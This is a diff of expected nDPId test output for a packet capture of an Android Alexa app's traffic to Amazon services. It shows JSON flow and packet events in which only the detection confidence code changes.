+00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1940,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976115901,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.180"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1941,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115905,"flow_last_seen":1490976115905,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976115905,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1490976115905,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976115905,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JUVAAEAG7uusECrYNu8YtJKvAbsZEE7TAAAAAKAC\/\/+4mQAAAgQFtAQCCAoA9muWAAAAAAEDAwg="} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976116084,"flow_last_seen":1490976116084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976116084,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1490976116084,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976116084,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8uXBAAEAGWsCsECrYNu8YtJKwAbtgAdLYAAAAAKAC\/\/\/tjwAAAgQFtAQCCAoA9muoAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1943,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":2,"flow_last_seen":1490976116119,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976116119,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwcfNAAOcG+0g27xi0rBAq2AG7kq+qRjf5GRBO1HASH\/5e8QAAAgQFtAEDAwY="} 
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1944,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":3,"flow_last_seen":1490976116121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976116121,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJUZAAEAG7v6sECrYNu8YtJKvAbsZEE7UqkY3+lAQAVepYgAA"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976115905,"flow_last_seen":1490976116122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976116122,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976115905,"flow_last_seen":1490976116122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976116122,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1946,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":1490976116248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976116248,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwirZAAOcG4oU27xi0rBAq2AG7krCs\/eb6YAHS2XASH\/7iQAAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1947,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1490976116249,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976116249,"pkt":"AMDKkaPvePiC0\/vCCABFAAAouXFAAEAGWtOsECrYNu8YtJKwAbtgAdLZrP3m+1AQAVcssgAA"} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976115905,"flow_last_seen":1490976118335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":933,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1490976118335,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976115905,"flow_last_seen":1490976118335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":933,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1490976118335,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976130073,"flow_last_seen":1490976130073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1490976130073,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976130073,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8j51AAEAGf0qsECrYNu8d\/Z+gAbt6Gf6DAAAAAKAC\/\/+QHQAAAgQFtAQCCAoA9nEeAAAAAAEDAwg="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2002,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1490976130307,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976130307,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAww\/RAAOcGo\/427x39rBAq2AG7n6DOZIqUehn+hHASH\/7FQwAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1490976130308,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976130308,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoj55AAEAGf12sECrYNu8d\/Z+gAbt6Gf6EzmSKlVAQAVcPtQAA"} 
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2004,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976130073,"flow_last_seen":1490976130310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976130310,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2005,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976130073,"flow_last_seen":1490976130469,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976130469,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
+00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2004,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976130073,"flow_last_seen":1490976130310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976130310,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2005,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976130073,"flow_last_seen":1490976130469,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976130469,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976133936,"flow_last_seen":1490976133936,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1490976133936,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1490976133936,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1490976133936,"pkt":"AMDKkaPvePiC0\/vCCABFAABDWl9AAEARM1GsECrYrBAqARM4ADUALyGouR4BAAABAAAAAAAAA2VjeA1pbWFnZXMtYW1hem9uA2NvbQAAAQAB"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976133936,"flow_last_seen":1490976133936,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1490976133936,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976133936,"flow_last_seen":1490976133936,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1490976133936,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2033,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1490976134135,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1490976134135,"pkt":"ePiC0\/vCAMDKkaPvCABFAADu5XxAAEARp4isECoBrBAq2AA1EzgA2tC0uR6BgAABAAkAAAAAA2VjeA1pbWFnZXMtYW1hem9uA2NvbQAAAQABwAwABQABAAAAMQAfDmQxZ2Uwa2sxbDVrbXMwCmNsb3VkZnJvbnQDbmV0AMAzAAEAAQAAADsABDRUPzjAMwABAAEAAAA7AAQ0VD8QwDMAAQABAAAAOwAENFQ\/PcAzAAEAAQAAADsABDRUPxrAMwABAAEAAAA7AAQ0VD\/swDMAAQABAAAAOwAENFQ\/I8AzAAEAAQAAADsABDRUP9\/AMwABAAEAAAA7AAQ0VD\/n"} 
-00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2033,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1490976134135,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.63.56"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2033,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1490976134135,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.63.56"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2034,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134140,"flow_last_seen":1490976134140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134140,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2034,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1490976134140,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134140,"pkt":"AMDKkaPvePiC0\/vCCABFAAA82ItAAEAGF7ysECrYNFQ\/OMsRAFDDaqo+AAAAAKAC\/\/9Q1AAAAgQFtAQCCAoA9nK1AAAAAAEDAwg="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2035,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134141,"flow_last_seen":1490976134141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134141,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -674,24 +674,24 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2043,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxLyFCLFnmK3JKAScSD4HAAAAgQFtAQCCAps+n3SAPZytgEDAwg="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxNJprFn0NKXyaAScSAI+QAAAgQFtAQCCAps+nOsAPZytgEDAwg="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_packet_id":3,"flow_last_seen":1490976134200,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134200,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0vDFAAEAGNB6sECrYNFQ\/OMsVAFCK3c6HwtatV4AQAVc6+AAAAQEICgD2crts+npU"} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134148,"flow_last_seen":1490976134200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71pwMKDRQIL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134148,"flow_last_seen":1490976134200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71pwMKDRQIL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 
Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2047,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1490976134201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134201,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0TQdAAEAGo0isECrYNFQ\/OMsUAFAHRT+xsJsTXoAQAVf3QwAAAQEICgD2crxs+nys"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2048,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA02IxAAEAGF8OsECrYNFQ\/OMsRAFDDaqo\/vffTz4AQAVcBnwAAAQEICgD2crxs+n3S"} 